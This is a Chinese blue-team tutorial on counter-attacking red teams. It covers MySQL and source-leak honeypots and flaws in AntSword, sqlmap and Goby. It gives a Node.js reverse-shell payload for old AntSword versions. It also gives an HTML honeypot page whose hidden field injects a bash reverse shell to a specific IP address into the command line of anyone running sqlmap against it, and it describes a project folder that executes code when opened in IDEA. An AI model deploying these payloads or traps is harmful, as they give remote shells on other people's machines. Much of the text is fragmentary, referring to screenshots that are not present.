【蓝队技能】【溯源反制】反打红队-蜜罐工具反制
蓝队技能
反打红队-蜜罐&工具反制
- 蓝队技能
- 总结
- 前言
- 一、Mysql蜜罐反打
- 二、源码泄露蜜罐反打
- 三、蚁剑反打
- 四、sqlmap反打
- 五、goby反打
总结
前言
本文汇总了网络安全攻防中的溯源反制策略,包括MYSQL蜜罐、源码泄漏蜜罐、AntSword反制、SQLMap诱捕及Goby反制。通过实战案例,展示蓝队如何巧妙应对红队攻击,提升防御能力。适合网络安全从业者、渗透测试人员及兴趣爱好者参考。
一、Mysql蜜罐反打
蜜罐地址
python2安装
该蜜罐需要python2启动,在安装过程遇到问题,请看python2安装解决方案
mysql反制核心研究
二、源码泄露蜜罐反打
- 创建空文件夹,并使用IDEA打开
如下OK应该是第14步
关闭IDEA,然后重新打开test文件夹,发现运行了计算器
很容易联想到,如果我有一套源码,按照如上操作方式,把可执行文件放在源码中,是不是可以上线CS了
蜜罐
三、蚁剑反打
前提: 低版本
上图的base64编码为如下代码的base64编码
var net = require("net"), sh = require("child_process").exec("cmd.exe");
var client = new net.Socket();
client.connect(xx, "xx.xx.xx.xx", function() {client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
- xx:反弹端口
- xxxx:反弹IP地址
四、sqlmap反打
ping "`ls`" : 显示当前目录下的文件
sqlmap -u "http://47.94.xxx.xxx/test.html?id=aaa&b=`XXX`":会执行XXX命令
我们的目的就是让红队使用(sqlmap -u “http://192.168.189.142/1.html?id=aaa&b=
bash -i >& /dev/tcp/115.159.72.226/2333 0>&1”)来进行sql注入,然后就是反弹shell到我们指定的服务器,构造的注入页面代码如下:
<!--1.html页面内容 服务器是Linux -->
<html>
<head>
<meta charset="utf-8">
<title> A sqlmap honeypot demo</title>
</head>
<body>
<input>search the user</input> <!--创建一个空白表单-->
<form action="username.html" method="post" enctype="text/plain">
<!--创建一个隐藏的表单-->
<input type='hidden' name='name' value="id=aaa&b=`bash -i >& /dev/tcp/115.159.72.226/2333 0>&1`"/>
<!--创建一个按钮,提交表单内容-->
<input type="submit" value='提交'>
</form>
</body>
</html>
五、goby反打
goby反打详解
对红队反打比较感兴趣可以看如下文章,总结的非常全
反打大佬文章